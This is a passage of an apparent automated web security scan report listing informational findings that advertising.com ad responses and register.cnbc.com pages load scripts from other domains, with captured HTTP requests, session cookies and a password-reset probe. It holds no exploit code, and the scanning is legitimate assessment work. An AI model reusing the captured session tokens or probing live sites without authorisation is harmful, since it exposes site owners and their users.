Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1017217.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Tue, 06 Sep 2011 15:51:56 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 561
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 15:51:56 GMT
Connection: close
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:51:56 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<script language="JavaScript" src="http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=31433009=_4e66419c,2816412382,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=31433009/optn=64?trg=&z=2816412382"><\/script>
...[SNIP]...

20.44. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=32696846/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=768033/size=300250/u=2/bnum=32696846/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Issue detail

The response is JavaScript that writes a script tag for the following URL on another domain into the including page via document.write (highlighted in the response below):
http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=32696846=_4e663b96,0078175275,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=32696846/optn=64?trg=&z=0078175275

Request

GET /site=768033/size=300250/u=2/bnum=32696846/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315340773276&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1017217.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Tue, 06 Sep 2011 15:26:14 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 561
Date: Tue, 06 Sep 2011 15:26:15 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:26:14 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<script language="JavaScript" src="http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=32696846=_4e663b96,0078175275,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=32696846/optn=64?trg=&z=0078175275"><\/script>
...[SNIP]...

20.45. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=41330653/hr=16/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=768033/size=300250/u=2/bnum=41330653/hr=16/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Issue detail

The response is JavaScript that writes a script tag for the following URL on another domain into the including page via document.write (highlighted in the response below):
http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=41330653=_4e664409,0318423006,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=41330653/optn=64?trg=&z=0318423006

Request

GET /site=768033/size=300250/u=2/bnum=41330653/hr=16/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315342934886&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1017217.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Tue, 06 Sep 2011 16:02:17 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 561
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:02:17 GMT
Connection: close
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 16:02:17 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<script language="JavaScript" src="http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=41330653=_4e664409,0318423006,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=41330653/optn=64?trg=&z=0318423006"><\/script>
...[SNIP]...

20.46. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=64844327/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=768033/size=300250/u=2/bnum=64844327/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Issue detail

The response is JavaScript that writes a script tag for the following URL on another domain into the including page via document.write (highlighted in the response below):
http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=64844327=_4e663f35,8102325438,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=64844327/optn=64?trg=&z=8102325438

Request

GET /site=768033/size=300250/u=2/bnum=64844327/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315341697956&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1017217.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Tue, 06 Sep 2011 15:41:40 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 561
Date: Tue, 06 Sep 2011 15:41:40 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:41:40 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<script language="JavaScript" src="http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=64844327=_4e663f35,8102325438,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=64844327/optn=64?trg=&z=8102325438"><\/script>
...[SNIP]...

20.47. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=70609416/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=768033/size=300250/u=2/bnum=70609416/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /site=768033/size=300250/u=2/bnum=70609416/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315340464698&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1017217.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Tue, 06 Sep 2011 15:21:07 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 561
Date: Tue, 06 Sep 2011 15:21:07 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:21:07 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<script language="JavaScript" src="http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=70609416=_4e663a63,7061078845,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=70609416/optn=64?trg=&z=7061078845"><\/script>
...[SNIP]...

20.48. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=7863048/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=768033/size=300250/u=2/bnum=7863048/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /site=768033/size=300250/u=2/bnum=7863048/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315340154901&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1017217.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Tue, 06 Sep 2011 15:15:56 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 559
Date: Tue, 06 Sep 2011 15:15:56 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:15:56 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<script language="JavaScript" src="http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=7863048=_4e66392c,0224774881,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=7863048/optn=64?trg=&z=0224774881"><\/script>
...[SNIP]...

20.49. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=80753902/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=768033/size=300250/u=2/bnum=80753902/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /site=768033/size=300250/u=2/bnum=80753902/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315341080962&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1017217.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Tue, 06 Sep 2011 15:31:23 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 561
Date: Tue, 06 Sep 2011 15:31:23 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:31:23 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<script language="JavaScript" src="http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=80753902=_4e663ccb,8430606850,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=80753902/optn=64?trg=&z=8430606850"><\/script>
...[SNIP]...

20.50. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=92276994/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=768033/size=300250/u=2/bnum=92276994/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /site=768033/size=300250/u=2/bnum=92276994/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315342624689&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1017217.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Tue, 06 Sep 2011 15:57:07 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 561
Date: Tue, 06 Sep 2011 15:57:07 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:57:07 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<script language="JavaScript" src="http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=92276994=_4e6642d3,1475285476,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=92276994/optn=64?trg=&z=1475285476"><\/script>
...[SNIP]...

20.51. https://register.cnbc.com/email/EmailSupport.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://register.cnbc.com
Path:   /email/EmailSupport.jsp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /email/EmailSupport.jsp HTTP/1.1
Host: register.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:05:43 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Connection: close
Content-Type: text/html;charset=UTF-8
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:43 GMT; path=/
Content-Length: 91322


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en">
<head>
   <script lang="javascript" src="js/subjects.js"></script>
<title>Contact Customer Service</
...[SNIP]...
</style>
<script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...

20.52. https://register.cnbc.com/forgotPassword.do

Summary

Severity:   Information
Confidence:   Certain
Host:   https://register.cnbc.com
Path:   /forgotPassword.do

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /forgotPassword.do HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; JSESSIONID=7FFDB885E3232AE9759F6D0A6D01E627; s_cc=true; s_nr=1315339307081; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSign-in%25257CDefault%25257CSite%252520Sign-in%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A//register.cnbc.com/forgotpassword1.jsp%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:01:49 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Set-Cookie: JSESSIONID=3903DB621D7BD6523413306545DD8633; Path=/
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate
Cache-Control: pre-check=0, post-check=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html;charset=UTF-8
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:49 GMT; path=/
Content-Length: 85618


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en">
<head>
   <title>Reset Password</title>
<link href="/css/member_center_sytles.css" rel="stylesheet" typ
...[SNIP]...
</style>
<script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...

20.53. https://register.cnbc.com/forgotPassword1.do

Summary

Severity:   Information
Confidence:   Certain
Host:   https://register.cnbc.com
Path:   /forgotPassword1.do

Issue detail

The response dynamically includes the following script from another domain:

Request

POST /forgotPassword1.do HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
Referer: https://register.cnbc.com/forgotPassword.do
Content-Length: 45
Cache-Control: max-age=0
Origin: https://register.cnbc.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; JSESSIONID=2468AC9921E8E376640A3CB7840EC38E; TZM=-300; s_cc=true; s_nr=1315339333234; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DMember%252520Center%25257CPassword%252520Reset%25257CEmail%2526pidt%253D1%2526oid%253Dhttps%25253A//register.cnbc.com/images/clickToContinue.gif%2526ot%253DIMAGE

step=step1&emailAddress=xss%40xss.cx&x=21&y=7

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:02:14 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate
Cache-Control: pre-check=0, post-check=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html;charset=UTF-8
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:02:14 GMT; path=/
Content-Length: 85679


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en">
<head>
   <title>Reset Password</title>
